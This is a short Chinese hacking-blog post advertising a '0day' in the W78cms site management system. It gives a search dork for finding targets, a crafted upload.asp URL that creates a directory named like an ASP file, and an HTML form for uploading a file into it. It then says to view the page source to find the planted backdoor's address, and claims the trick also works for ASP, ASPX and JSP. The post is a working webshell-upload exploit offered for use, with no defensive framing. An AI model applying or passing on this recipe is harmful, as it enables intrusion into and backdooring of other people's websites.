W78cms网站管理系统0day
漏洞很简单,出现在editor上面,大虾应该都知道:
关键词为:inurl:ShopMore.asp?id
访问这个地址
http://xxx.com/nbwebshell/admin/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=0855Hack.asp
访问这个地址可以建立个0855Hack.ASP的文件夹……
再用这个html代码上传。
<form action="http://xxx.com/nbwebshell/admin/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=0855Hack.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
上传之后查看源文件,找到小后门地址
对6.X的也管用,对ASP。aspx。JSP。均管用。
下一篇:环境变量的运用 – 又一提权技巧